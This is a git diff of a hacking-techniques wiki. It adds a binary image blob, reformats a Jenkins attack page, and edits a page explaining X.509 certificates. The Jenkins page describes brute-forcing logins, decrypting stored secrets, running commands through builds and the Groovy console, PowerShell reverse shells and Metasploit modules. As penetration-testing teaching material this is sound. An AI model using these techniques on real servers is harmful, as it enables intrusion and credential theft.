z033nGenV6)-eEa6t48!QCxl`S?9?*syPAh!Ee0ohpL0)1pSn-=v*)AvNSlS&U}WAm z#H`iHYeyy9M*(j}zZc{?E&Db!_N83!6SNLYv$5EdKX?#_nerE>x6|JH0SWhZrF6U^ z^W26R@0u(LNe}k)p}V>y3!GY}rm-pI^D5qe>PKZGT}YPX7&DF#dX>O&CpFSW8QwC$@4R3{&(rVBh+|*t@zz0KFOQ-lAFPzP=azW~M zsL%GAEh?mDQh-cabh7VEENk@s#mN~Q#?(#JN&}|LJdS6|k4WEAj7ajC991XQ>{2s- zXEn2{O{&Ftk12C+^adQusrITz#FD-;sPWsyL5FRWQC~`4nVxsQ7BuofLN(E;^&{fE z%VESP03$>^Wh6f6Yw|H_T_*{rU+E3eOdjA;a8Jtr(@xw2w9uzHZT3X=M;skcZ9wZ2 z?M2$~N1f~3jnNmX^EOCzJMXU_`_UabI{BD@sWlwk6xGkG2vrc{Le14E1L>|2I_{5r zYpYp`�lM+?mIx1rxm_nv#fb>-}#LZ{c$mmvEr_@u@eZrHWl4*KlLL_hv8KX-q%M z^zu&;f_##KIgxhk+`xte?JlV z+f7PLZY4jlcHZhxh@~K@Cp?Des9b2u+3)jhlNDV$3hQA5mm+%tj^q}iNlgB6`HSJC zBePp~`BVXE=9(lCO%2uX)l1`x;R*)}Ghn4P#@N_X<<5@QT#Slz@$}wqQqt@47`FS2 z&~D>AMi3AQiCYPL%t7T11g_Ee8cl!eQV>0TRp#-bcp~?B(;HWe8-pOub1-A$g?Net z5OYl?I6 zV7(`+BI+3#8ysYArM*3jg`<;9ONw+rJn1ML#;}>qHa#=v+nB`(Z^|=u>AoH_6W0JC z+bB%QdiXq$17xDB__Z}Gpq;ia`P5uDQGht)4jV34v?wdo(Kk0QJf*G(w!5`NcPLK% zkvnrB#vG1c*SpRqr(E^W(0g-T{UDaNg^r-n^QZGZmV`vv1c~<261Sm1wnjmziJ5HwvQpx;uH3h5g-HY9VMs`b)Fa zpkE8CT#sjbI$TnRSoC8Ac+8vQ`|)KC;%542!Hp-wK&H@3k@ed^(p+!$ze%<&XNoe`2Y?*H1^wWE=Uy!vPp-^DAq0?jBNB zwETNgT+X8Ssf9Ng(uTfvNDfx%unqj-c#w7ckv5cTQ`&XEe=aFZfp6EbM)=0V9k_bb zRcdP!w!eaNrM1UZPFwH=B*UAmh%K9m?mY4H^+6QUQ6lYP#HFqBrltZO71t9*S1oHd zt5w!I@-*W zX<6;c*-tQs_f^uzC7` z{7&&ETbu^7@ab*M-a9rmA{;a1jc}859j3hfO5a|J;j8CYcMAszGB_a9EyiL|jfmZl zH<(61S<2zL*>5M=)lPXVrKg_oR8ysd2Z3Q0Zur-HNdaz82V9zaati&R*S+UbNwh4j zfvyg*>MiqluKA;@b2w*mvkiVez|q%vv9Y*VSo5b+nlox8Zca2$zq(6t_;%aJkt3W4 zzOYUvtwUpxrcyc{dRWG^3z+Y}Caxkp?6RUXyExI7Lu*WoqP%;(hq{enKBqf=@?7*m zR`d_HIg+wkBnRTj&;x~1>j#DOeGUVve0HuxRVOuOBdtW8!2L+=Ec!w%dZaqd)q;k$ zVEcJ5a?E`>Ug_tXAlkLO8ury^sUOeY9|288y}_lt$z0!?7~7hGFtZFAy1S3LBl?KXcG<0iv&nlBEzsNpy zgZ3y0O*yqzL240z)|Ojio~Mq?ra9yWiFE%V$7^}17nCy=^iZIHSS4KB(=I%GbVo+^CGR>A-&RZSdQF#6h>>oS%UytW+%2=2^TIbdYCZZ|xacG@ zYE!pnh-5MlecRa~tfLSlcR&`|F}C48_SOEw*Cr2hR2|}>i>=lh7B?qFi|@yq`>IgE zw#^D&*)1r5YX%dQ=efWU3`8Ztf>g>s3ZX(mX$4V>^-zLN$|9v5f@HmQOhV*7gXAVs zQM|8TDrRkd-kdPg>WKZ$zs!m`U<|T(sv7Qk`2PKSyRdLZ_qQ2ek&)9YD}%TiAMRIr zVg=EI{=$9!hSwU{HZ8<0O}w+ulz6RO9$01DYulYJ;rW^Ke1$=7ttqaRX-{Gygu>_~ zh)*P`5K}Fm_f0_?jGMAQ(ECYLRRE!EA*lhkR<#4{_&4|r(p?fZGb#?<*$y4qmB6}J z(czReLnDY++ELS<4vM&6O6@wH7p>^74*||A{3YLyDc5r4@7IRG?^nuj{23=tKYS6< z2ugC&7{?1dbssZ9heE81cb6h^T_IXCGSch!F+Ua|q1YLWI)h=ldGxaOky#bX z2Iaa~lA7tDHrSy*XQFGA8sQU`m7fMV<;mk_7>2FcfOnCYZLS`bLt~nJd2A&7I;!FA zvSxCxA!3ERe3KP!#esEEi;lIS-kZiExvQ5N+1qZZ>&Rlew@bm{#o>TQaLrMB2PqDE zI5$codzluA+_X+W}~D}u6z!(tkUv%T3W!;)8c!5iaV58 z$`ma(OBEcP8taf8{laP0Jw@#N;x4+X?OEBD;5o9`QF^M^UkKMH4?kNEdfI^hA{<+Y zh9~+=4d(iZT9k+);&m;qC~hT5Cbu@5rP#^ilw+lEa35AlF8T%1DMO$0NSytNKjwr0 zN!pLsenF@O7UaOY&!Tlix=n-~_^2E=E40yDzbG}8<%eVpR-tG%9EowMk2zYY%xX|x zpQ>+37Xow|2XX=a8X4&(aBMk5*cJ%IvEt$gw!t56)MzYk>GRHiN3mk{aN?6}thM9! zmQCh60mKjpPGL0P}Y0HuduvRSCycPEs>tvWm0mX5K6S|s+^#+ z`^-vqdM}Z_PMpMzAncyYFod@qOnIA8qtB*j`#4@Yna0a2>Ziol^>i7XCI~`fZYsQG zB&cw8pbdrx5_!jSv?tm)|E{_kmf=w z)*>$-mHRUi9DTH}z%_)I@8-#~dimB33+Wl2hlwsx<{AqibC#YvqLvQOCqA6jXa0a1 zypXZiMx6}RbNsPtVT3NKg*Me7i*~>BF_ns4J-Q#eRViX}&jo=U*HrsOu&RrY)z4LU z33>@Z{$iAVb?y{VEF)-Vj^M@3wEdWODgqzr2 z@m@-gzFK%!sD*FIdYCUbf=yR2zx6Sbkb_Ojm{+B=59=!(l=>dqEh;L1Ep$N*hJwac zvr>-c45K?!lit0J&c(<*AUZWkhTuKGvE&#F+>W&-Fw!w2GV6VwH3m+d)9%)=zU0T> ziejSq=EFxuC!E4H?^fbv7)+h&V(T0H2m|}*tzS~<)W4-rv@0N|$3@Rmyjcg>z>y|*7xD+{-Ss{ncsl14d*a?ZVDr~1qyv+(0)n=2&#&B0yNmpO znpzzfU%9R20{aY66i~etaXYGcOk^qhkXvtQxhoN7tjrhL`k`>08Joh4M# zu(Vi=eq||Bf-@%WLpgM{y7$;y5AZboCJ?LB>iG9yB<62}&t-Xq})ybi9h{_8&Rific2RFbbM z@|WyMeCF*ed-WFg!J1;|sxx1*(qZb_yAlG~#d>wC8#SF<7U~2|hZyoNo62e>-(C1_ zkG#ph8p@DR!Oi^)xpb15MNL~qm&rPNn~zzliV8VZw|%V4R{P*}4dwns7Dz`P(BMY0 zxXyWBF&;1BJy%l=STQAO456ktT&oB*g?!~;k;gUZNb&pGU^!akqdiO1-)U~ymBmUr zbOrUHoxa_oMN`+s8rQqZ=vz^&aE>*tf#*`O^(zogS_yc3nFxA;R~MeX#lL@2CvDEVqK1;pF)9|ZXS`W^^UE6$-9x(QT#UUo116gpdV%@Pkez(Lqj+E-mG#_}xC z4CH!^Q!2Z4R3qzscU-x!i&B^4`f2nxH~Cp&Px$pLphbb-XRzn1_tE-UMmq^3;&41$ za|Oz-#_(_R@T{)d8ADH05&6ISod%9$GfIbQI#lb*RL<5vy4;~~FA(z7T!5*rh;!T3 zFdKgq2fTJtskV2te-0^h{jkuBb#GrA*O{i0Xt=mv@)9lwm`OHvd9Y8V$GJfWi2M=D zYIurbF!Bo`PtvZ2vvZ~)5(Vxw6P;>2cGPoP>U1W-;%Sc)Opg?FqbuTIFI}B}&H;>EW7z z>r#4^)2F6wfS9a@noIF~Gyf5<*Cz6p=8i@NrKa%){_1koHSSs9%(lbpz6%=9=~lyD zpPN}&n6DtFF7DH{hUH>ZcOT@;w!ij zmX8I-x{`uT8W$q-{C^T9e0i3d$!-WIF@BOKqOoD~6*L=->JKHQL9XQ4Z;52|rh1Cj zTrC!s)<#Mhc`e3B>w}Nt;IW0XI=y+%TAP001#9k#sf4Yc)BS>kfpm~|NZ^QOvO$=B z_1qZ%CMJ-}&8&B3hB3Qe&icdU5`++?APpVvC+c=BHA`}^3&~C4dr2|$pW5cq2zsq` z#mQeW<%$X#DwUBDw#fddQc78$xmu1|u69v|3J3`VtkuTcJ{8I3Y?7mA0|424@qsj}y5T6!B>*IF{ z;&;K@K8C1}`|HY^ZApaR>@qH4M^I+kD%)yQ?zg_&_R@}EbSABc)rYCr6s*nQb z%nI^fi16sIrqi5v7AxO~O}uh_YGh<9+XZ7-g4PL$aSV-pRc(MEOZsU+t-bRzjI(^{ zx%vy|{z9ZK%ms~*yD%O8*Y9LOThh~Cd zN9?VVlqCjT%j8QnHu}YL0()W&`Rf#R6I%Z|K*zf@lOLjdXzU%GPsoLk5HDGP42G#3 zAbOO=iqdaxTJh!F&gNwK&MudAiL{>fu`7i7kiv^YVTEgmf(RlbJA4Ek-i}j}8rh7E zFI1~Hd5sW&nrtblo9;yD6+*s$|DK0`7Hz@69oPSw_?k|@K2Hgra!b;|F5&$X4vr-3Z!SOsx_;@9L#QR)9whPW#Ylne?ujqWDCuQ+9k4GDF{`jT1+(B?oC_iGp`478&Ay;FjS026^~ZX~2yi`E;0e9LVtST@^6}N(`(Ye! zRsN~4%sbF_bUw8m^_$FZP^jdWBQ>|F>U~TnfIX67L|;M zOn2sc?pyw(eXbnb=1R-&+JG(nB(uM$MITLk#NS5|^+T{idTm5iI+q&?PUTv%~j z@1FvYn%VP?pOx~OMQp_n_v2lCxY;V@!n;cqnj!`QvJNRBw$_J5KNVAN5hVYHzo*y3 zPoCZ|dKAm(vOKuCDA%%z6~q<<&NuagsvM}8|71^($+SPXmc9Mv#MAZiLvrPh9K)ya zD-+{y?E5e<3=h|HS&)yiwe!k&8MeKe)VZvj%9r@MY}K&+C#vA=JslG)wyx{GhHE!*+PmSK6kp~-jrpYg*NGS1 z=5s#*I#Tn`dWkJimB5Ze^wGlr+9(pxA9$Ek+u2nh;`uoA9Y?KEPPlkH5H-Z^%-HM( z^9wZ%xP>Gvh@^%4sU@sfO0Q#guyypL`4|RO)dhA?&0SE1l(J0Bg;@SLKfM-b0i5VQ z;fU-8q875}FJ_Nl5$!qLQ!M60NiJdMe4HhFoNjzi8u zBZ+;d0a%5*LSV2IbL~Ap4v0V)hxcGR5oM;VhU~&O`@a{X{28pCir$)F4te=dUyyi# zi)$z;m_1==@$Dp&pcNsRxPJvhw9_L`e!R$UFq%(c?Jyz{0X*REg>B|JV;+)teKD%L8)%KR z`nEmPL4G4__*qrji|Q}~8P6NbjdYkP5)+f+IXs$jzjY7LlS+J*a6_qwi;Zf^*5^on zeq&uHA~*gQyeVlz!X7%ERJyh6P)_(WLh#o zXGXFgYNel%E6Yj5fGkSN0?j{tVLc^zhp}sdEt;Pc?fn-lik+?{;^g}TLt+X{CT)Ke zM()(xWu37l5yOT45hgfH|`SEF469 zqW6GA2Z3OqoSKODt+=LfH?DVwXlebhvvoJ|9GHW+UozV!_Z8-DV^HJ)PgfR|3y z_GWu)Bq@@veW`KlDLSNTeB9_i!geW=csg*DCqwV+^84jYAsI!xV@u=qo(h%68weE$ zrLZ#T)PwunE(X&i6#@Rj%8d)muz5;h<;_o&!PN%KKti#WAl%1uP-$7x^`Kj&h+kQeFd-DF&*ezYnJNEv> zzD;;NhNns`$ng7^s;5(hF%Q_t4|yHT3q{ z?`)h5$iUxHgM%F5nx|`@s%>%E^hl2vdHhWHeHqdSIU+RwQl7gAYiHU$Tg@CMS-7TZ z`xtwP_41WHc@d*3-minyr_d^VL?)YwZLFpqQvGdBuE+Iv_QEM&@}LXs%*U4YHLv zfhYsO1sIP6Wz9Uov5CKRazAUEsE0W00O3LxDm;tNw|5C`3#tDF*TlWDdVpBGo)fYX zC+)n*`IR~F*Aj3GX?{scY@87@GSw)%7mpqE05176kGrYw@}i^penzF7=cnT4e^KV# zop5@!WCL^EICXg8uzd$1O(*Ih#|vE|zp}a%g{Mi-*{>Fjw;t(!eRL4m)hKu`j7vR8nc{i$`xamUB;IWoMPfo$n4 zP1=xCYY;YV;k#37LHW&#)|p*qb$P z`q3B8!mPzWs7&@Bis;oZkk(x zUEDIzPNgpzmE=}UY}exKSMT2tonNWKMINH?bbcxle)VexhS&FP3SWvxDKp^55YhRe zNUnog`xx(^?e^{s)50}aj_{MIbG?o9=&lE?-dyL)(!J-8kqQb9D1Pctdv5XLaQ+BG z%-D@^)R+jw3h?!dAj4oc`jCRG7Q-obJonJKD+{>L>5Ci(FWRNskwu|=sCUUXQ9+w- zl1WJyQUBXU@|IxuR`_i^z%>y-4pG@O76lTicic;@^=9L;_9>XZoY3^>zWKG5Uo^6l zghaiw1YYQ^vz3XRnvGe@EeE7`Nv9DfIrE)wWmLORmZC{E!-C72p9zy?$i_ zLV4X@DoV5>WTsU$hlK2g?gXdjkJM>FcJ9lh#ZmC%*-j4N9$A{8FNS5Be5mZunHOe- ziU26_Hd6!(U0LklHcXyPGgML3#21{(m{p&+VCy|MG+^8#tOH&$eI$g8C zJ!p55dJNowZSN|>tjZI7W`|Z4E&&(x$F>FFo`Jt(`e2z}q zwgKPcAk9hNN5+k|S|I$exN#*Yt2ARzU>&H#k9$?{t0dDh?cQttqO~cqK#xqa5pS1jRPq| zBYPOLi%so?3`oCeDdiwi?T_CFzxnv5V+E8*;m!$goHZz`51)#8>z40vNd}aRGXkO`w)J$9o|>FT5TI`BIIj(UgG-?l zJ%S>ZE5Y=1w(zwC$$Gf1)O6qdZS-`GbISKzK8@WZ5{cKFz-=;6-v}KMSsQLhO4#-6;Q1z?aT%oU1ti`6ddPTfM=#`C-3XEdiv4Hp&jw{nYq>R0AFl` zP%h7GLE@VgySEcqLYl~YaMLB;YrJ9)Em4b$Pnk3^4HW`_G*<+*E=M|`p_+z505w^5 z-urFc43W9TO*T|u6p;_!_J()-(Mvh7?oP0p8L|TCtMbo z5ZStQ9wT|!)cr)s)bKeGf-P?Du;VzWq4vZNhkkZFkkQ23q)=iTnn5&aSe_@684Yn! zy7OBh7*Lo_e^edtTMgUOChFwP+lLOAH9=94Bs!t1ViZBW%F=HT|)o%^M@0EG42d?6978TZIEU5bn2AGOq>wG+3L zY=$fDd**bxX=??!JF@ERMp9STJ%i;fK2;8fC-DM52jQ8lAL_%uFEt?m4So)v^7St@ zM=PqzslzKXS*M>H?m8z!@>5~1cy9cc)$r8X!VV@_Y}Lv>_z@PH;z~K!(UrB3`g|{n zmrY1TNxt9Sb<#!gha3L~ywY1_J_ksGA{^6>{A%^}5|EzM!+jFU= z6(uFlb`C!)Vs|X?FYP9|&N0D{&TZ*^N^`TnR#>O(j*Uv{#yqRm;+BK%b=E!-b_tE- zB>ENm0N$SvGHQ~BtjkNR^Jv(*bR>X1rPk-+E;!BXJdF+@VyV{SUS>}AEUx#?oQOi0 zTM^?v6RiDRRX_D7vLaoa_Tt5ps8(`Kh&7yvld(9V+nvN{Z5gib@Tbal)(p=+ompOK zpe$aJF$ZAz9A+n61K&_Red{hq!E;}2hZDA3nIm>6zjt)pkj3qOs@I-bgU`OS9Z&E{ z?v5Q|qvL?0k6ueUb?*>h5G-PFacn*MnNN7DBwNb9Gn8FJ3J5IP)%+1h=pS`Nc-71p zC%ZvJmvW>GmXHuz2F^Ae4lsE+f(~<#?VXE!nZM%oz<_>&2oKX;=ho1w+mBYFcWy5y zukRS#bboHz%LZX|kX_MW0Kcnbfy~q_*FHw>_;R93!FPHiUGU<~8Yu90ROshAj-y&a zIva@|Aa+`!i z6n!FBm8bbPF%2E@k7v$!rb|Q`c`VZ8J|109(2eG#SIuY07z6Bq| z0_|=;^&ai4!C>%iysdk>i=`Ub0}U1ex?H%z;g$Vljv|t*V|pBkw0Lh<*)0%SEi5T0 z*w_>VnN^)GNQud>12Jb(bKRJtJ-3%1l)@&+R^--nTw}L%A(6F>=o!#(al4v*>RH;Y zn{eyS%KsMcQY;EXHeE0}q>u#5>OtJN?QND~HL5ypI&Wwlf?sseH%_%clnvwcRM_c{ z9l5FEf1pST!4lsWaIm}^P%mAOaY?&?YuR_} z{()Z9w?6t^NQhsj;Kk16ioSmSp$IMxIu0Gy&DF1fK{aKEHHhJ5h4uD8G>Q;91k)!{ z@*LpVT-=NZB}3|MAK<-x@$T#+Gkerun`F?Q(3y#ol9SD+ADVt2h;*kTJpI`9>ssyy z;;e4h6Do=yV92iE^n;um#T zvxP~q*y1+>xy6Hz%A>ak8?)aOPQ*h~q`mHkEjd}hj}Rcd0(#i`(fNiy*Js=UvxU0B z>Py2MR}=%IT7=s2;s;c$<)uL$?-e2cBbfw0oHO(!6P9i)om$Gd^PHbIT%V8Gvg2>T z$h?0D!b`$Mh`$Cdbiwj?x6*QMqN19eOVl;eVW?yt{`nFeeNfxfJT5Ak!OU#ufNOrt zD;!sf_4PawkKip3_e9YLFzmR)MKA|T5~3+I)rbvO_`deBziun%UE%z9%V40RA^D+o zSvj4Er-O~HZ{3mfy-CQ6EYmZ^;NU5Z#Re~AG!2z@k)8MBRai)0VaOLX@AzvRt=jQm zw|Sa-<55ugYkGPk9(ol=`Nt346miz}B$JB=I!P$CmXA9Qf(ir;7`#XiJ$HA{)@sCE zr)zKbPunsA=Lvd9>l--E5rlDja_YY@NxX3lp19Q`W%!8=Y$8ub6NxVSQXbmj z>R>f36PIcLi|3BvyKc^lB*-svd~VV81u52_qUY0UIXUUdmLV??m%qp}-tGA8thP&g z*~N2X`KppkUKZX-NiImHE524tg-BytMHNEJq|Q>$?OXG|`A5y`i7CW$C!(vghv)`N z@J+Fx@xrf?5+T>nu??4_1^3?uCus+X!$Q^+o~5sO1~TP2juF}x;=%|Ksz+yL)JX&$ zlqJ*683m0q-b{y<*wcovduYEPYqy{J<5qH0SQ1aAa28$?MDtI^=5krt5`%H&-Un(1 zq9~^_E7*KsT)hg78U0=T)qVrj_D|lzv7#PN-ndD@QA+al8t^ zL$8q#N!}>+wVoxl+}Yq>8B_mqvg~4b7wk&goBn3ZOmZNT@rc_*Ql^?z1rkd)TwdEN z$o%2-`OnMvC+>ka_e=>-W_WqLZb34Szc%BwM_FDK2H0Bo>~w#P3LeNrG*g19Qz>GX zQ^ZlVT&qcWV-0S;`iwc?dBaY?BTEd9Z-9~oCM9fR!m>uDZBC$`Ba#r8PA_66vCli& zyZoGC6K-Khr&}V?IEGv>KV^sQ9-n%)M4tgg>~;hK&sC7sf6Z zMHMDE*Wb?eOJNKOd|nYwmP4LAZRAfYjNb|b+`7K=VaDJe5FHR(#I%#kBn&H1J9at5 zG;oQm=iVu7yu!5OKvGV*NbCE-Bz~4dCUJ-NT29&O{mcEA7d;GSy z8);#xVK1&pBY7f19^Gn_4)F#a8DRL2@*OF?2a%lMO_{GI8y0J~-Qq$X&>h4y5zF`m zc9o8hS?Q$@grx|CH0UolTiTW)uv8CXQj6cDme>d|=@GN47mG3V1xl?$-JImRCr%!z zg(eOD-VJGNz}&NcpS?xR*kb&=oNl>*dh!E-g6#k5>tuf~!zBWsG=TOa6#+c4KYuU( ND#@wK)<~O${XhORkL~~f literal 0 HcmV?d00001 diff --git a/cloud-security/jenkins.md b/cloud-security/jenkins.md index 5cdaca9eb..b00c9c6ff 100644 --- a/cloud-security/jenkins.md +++ b/cloud-security/jenkins.md @@ -1,4 +1,4 @@ - +# Jenkins
@@ -16,13 +16,20 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+{% hint style="danger" %} + -# Basic Information +Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**. + +{% embed url="https://securityhubs.io/" %} +{% endhint %} + +## Basic Information Jenkins offers a simple way to set up a **continuous integration** or **continuous delivery** (CI/CD) environment for almost **any** combination of **languages** and source code repositories using pipelines, as well as automating other routine development tasks. While Jenkins doesn’t eliminate the **need to create scripts for individual steps**, it does give you a faster and more robust way to integrate your entire chain of build, test, and deployment tools than you can easily build yourself.\ Definition from [here](https://www.infoworld.com/article/3239666/what-is-jenkins-the-ci-server-explained.html). -# Unauthenticated Enumeration +## Unauthenticated Enumeration In order to search for interesting Jenkins pages without authentication like (_/people_ or _/asynchPeople_, this lists the current users) you can use: @@ -42,12 +49,12 @@ You may be able to get the Jenkins version from the path _**/oops**_ or _**/erro ![](<../.gitbook/assets/image (415).png>) -# Login +## Login You will be able to find Jenkins instances that **allow you to create an account and login inside of it. As simple as that.**\ Also if **SSO** **functionality**/**plugins** were present then you should attempt to **log-in** to the application using a test account (i.e., a test **Github/Bitbucket account**). Trick from [**here**](https://emtunc.org/blog/01/2018/research-misconfigured-jenkins-servers/). -## Bruteforce +### Bruteforce **Jekins** does **not** implement any **password policy** or username **brute-force mitigation**. Then, you **should** always try to **brute-force** users because probably **weak passwords** are being used (even **usernames as passwords** or **reverse** usernames as passwords). @@ -55,33 +62,41 @@ Also if **SSO** **functionality**/**plugins** were present then you should attem msf> use auxiliary/scanner/http/jenkins_login ``` -# Jenkins Abuses +## Jenkins Abuses -## Known Vulnerabilities +### Known Vulnerabilities {% embed url="https://github.com/gquere/pwn_jenkins" %} -## Dumping builds to find cleartext secrets +### Dumping builds to find cleartext secrets Use [this script](https://github.com/gquere/pwn\_jenkins/blob/master/dump\_builds/jenkins\_dump\_builds.py) to dump build console outputs and build environment variables to hopefully find cleartext secrets. -## Password spraying +### Password spraying Use [this python script](https://github.com/gquere/pwn\_jenkins/blob/master/password\_spraying/jenkins\_password\_spraying.py) or [this powershell script](https://github.com/chryzsh/JenkinsPasswordSpray). -## Decrypt Jenkins secrets offline +### Decrypt Jenkins secrets offline Use [this script](https://github.com/gquere/pwn\_jenkins/blob/master/offline\_decryption/jenkins\_offline\_decrypt.py) to decrypt previsously dumped secrets. -## Decrypt Jenkins secrets from Groovy +### Decrypt Jenkins secrets from Groovy ``` println(hudson.util.Secret.decrypt("{...}")) ``` -# Code Execution +{% hint style="danger" %} + -## **Create a new project** +Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**. + +{% embed url="https://securityhubs.io/" %} +{% endhint %} + +## Code Execution + +### **Create a new project** This method is very noisy because you have to create a hole new project (obviously this will only work if you user is allowed to create a new project). @@ -102,7 +117,7 @@ If you are allowed to configure the project you can **make it execute commands w Click on **Save** and **build** the project and your **command will be executed**.\ If you are not executing a reverse shell but a simple command you can **see the output of the command inside the output of the build**. -## **Execute Groovy script** +### **Execute Groovy script** Best way. Less noisy. @@ -130,7 +145,7 @@ proc.waitForOrKill(1000) println "out> $sout err> $serr" ``` -## Reverse shell in linux +### Reverse shell in linux ```python def sout = new StringBuffer(), serr = new StringBuffer() @@ -140,7 +155,7 @@ proc.waitForOrKill(1000) println "out> $sout err> $serr" ``` -## Reverse shell in windows +### Reverse shell in windows You can prepare a HTTP server with a PS reverse shell and use Jeking to download and execute it: @@ -150,7 +165,7 @@ echo $scriptblock | iconv --to-code UTF-16LE | base64 -w 0 cmd.exe /c PowerShell.exe -Exec ByPass -Nol -Enc ``` -## MSF exploit +### MSF exploit You can use MSF to get a reverse shell: @@ -158,15 +173,15 @@ You can use MSF to get a reverse shell: msf> use exploit/multi/http/jenkins_script_console ``` -# POST +## POST -## Metasploit +### Metasploit ``` msf> post/multi/gather/jenkins_gather ``` -## Files to copy after compromission +### Files to copy after compromission These files are needed to decrypt Jenkins secrets: @@ -184,14 +199,19 @@ Here's a regexp to find them: grep -re "^\s*<[a-zA-Z]*>{[a-zA-Z0-9=+/]*}<" ``` -# References +## References -{% embed url="https://github.com/gquere/pwn_jenkins" %} +* [https://github.com/gquere/pwn\_jenkins](https://github.com/gquere/pwn\_jenkins) +* [https://leonjza.github.io/blog/2015/05/27/jenkins-to-meterpreter---toying-with-powersploit/](https://leonjza.github.io/blog/2015/05/27/jenkins-to-meterpreter---toying-with-powersploit/) +* [https://www.pentestgeek.com/penetration-testing/hacking-jenkins-servers-with-no-password](https://www.pentestgeek.com/penetration-testing/hacking-jenkins-servers-with-no-password) -{% embed url="https://leonjza.github.io/blog/2015/05/27/jenkins-to-meterpreter---toying-with-powersploit/" %} +{% hint style="danger" %} + -{% embed url="https://www.pentestgeek.com/penetration-testing/hacking-jenkins-servers-with-no-password" %} +Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**. +{% embed url="https://securityhubs.io/" %} +{% endhint %}
@@ -208,5 +228,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
- - diff --git a/cryptography/certificates.md b/cryptography/certificates.md index a3253bb8e..fb581615e 100644 --- a/cryptography/certificates.md +++ b/cryptography/certificates.md @@ -1,4 +1,4 @@ - +# Certificates
@@ -16,8 +16,15 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+{% hint style="danger" %} + -# What is a Certificate +Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**. + +{% embed url="https://securityhubs.io/" %} +{% endhint %} + +## What is a Certificate In cryptography, a **public key certificate,** also known as a **digital certificate** or **identity certificate,** is an electronic document used to prove the ownership of a public key. The certificate includes information about the key, information about the identity of its owner (called the subject), and the digital signature of an entity that has verified the certificate's contents (called the issuer). If the signature is valid, and the software examining the certificate trusts the issuer, then it can use that key to communicate securely with the certificate's subject. @@ -25,7 +32,7 @@ In a typical [public-key infrastructure](https://en.wikipedia.org/wiki/Public-ke The most common format for public key certificates is defined by [X.509](https://en.wikipedia.org/wiki/X.509). Because X.509 is very general, the format is further constrained by profiles defined for certain use cases, such as [Public Key Infrastructure (X.509)](https://en.wikipedia.org/wiki/PKIX) as defined in RFC 5280. -# x509 Common Fields +## x509 Common Fields * **Version Number:** Version of x509 format. * **Serial Number**: Used to uniquely identify the certificate within a CA's systems. In particular this is used to track revocation information. @@ -68,13 +75,13 @@ The most common format for public key certificates is defined by [X.509](https:/ * **CRL Distribution Points**: This extension identifies the location of the CRL from which the revocation of this certificate can be checked. The application that processes the certificate can get the location of the CRL from this extension, download the CRL and then check the revocation of this certificate. * **CT Precertificate SCTs**: Logs of Certificate transparency regarding the certificate -## Difference between OCSP and CRL Distribution Points +### Difference between OCSP and CRL Distribution Points **OCSP** (RFC 2560) is a standard protocol that consists of an **OCSP client and an OCSP responder**. This protocol **determines revocation status of a given digital public-key certificate** **without** having to **download** the **entire CRL**.\ **CRL** is the **traditional method** of checking certificate validity. A **CRL provides a list of certificate serial numbers** that have been revoked or are no longer valid. CRLs let the verifier check the revocation status of the presented certificate while verifying it. CRLs are limited to 512 entries.\ -From [here](https://www.arubanetworks.com/techdocs/ArubaOS%206\_3\_1\_Web\_Help/Content/ArubaFrameStyles/CertRevocation/About\_OCSP\_and\_CRL.htm#:\~:text=OCSP%20\(RFC%202560\)%20is%20a,to%20download%20the%20entire%20CRL.\&text=A%20CRL%20provides%20a%20list,or%20are%20no%20longer%20valid.). +From [here](https://www.arubanetworks.com/techdocs/ArubaOS%206\_3\_1\_Web\_Help/Content/ArubaFrameStyles/CertRevocation/About\_OCSP\_and\_CRL.htm). -## What is Certificate Transparency +### What is Certificate Transparency Certificate Transparency aims to remedy certificate-based threats by **making the issuance and existence of SSL certificates open to scrutiny by domain owners, CAs, and domain users**. Specifically, Certificate Transparency has three main goals: @@ -82,27 +89,27 @@ Certificate Transparency aims to remedy certificate-based threats by **making th * Provide an **open auditing and monitoring system that lets any domain owner or CA determine whether certificates have been mistakenly or maliciously** issued. * **Protect users** (as much as possible) from being duped by certificates that were mistakenly or maliciously issued. -### **Certificate Logs** +#### **Certificate Logs** Certificate logs are simple network services that maintain **cryptographically assured, publicly auditable, append-only records of certificates**. **Anyone can submit certificates to a log**, although certificate authorities will likely be the foremost submitters. Likewise, anyone can query a log for a cryptographic proof, which can be used to verify that the log is behaving properly or verify that a particular certificate has been logged. The number of log servers doesn’t have to be large (say, much less than a thousand worldwide), and each could be operated independently by a CA, an ISP, or any other interested party. -### Query +#### Query You can query the logs of Certificate Transparency of any domain in [https://crt.sh/](https://crt.sh). -# Formats +## Formats There are different formats that can be used to store a certificate. -### **PEM Format** +#### **PEM Format** * It is the most common format used for certificates * Most servers (Ex: Apache) expects the certificates and private key to be in a separate files\ - \- Usually they are Base64 encoded ASCII files\ - \- Extensions used for PEM certificates are .cer, .crt, .pem, .key files\ - \- Apache and similar server uses PEM format certificates + \- Usually they are Base64 encoded ASCII files\ + \- Extensions used for PEM certificates are .cer, .crt, .pem, .key files\ + \- Apache and similar server uses PEM format certificates -### **DER Format** +#### **DER Format** * The DER format is the binary 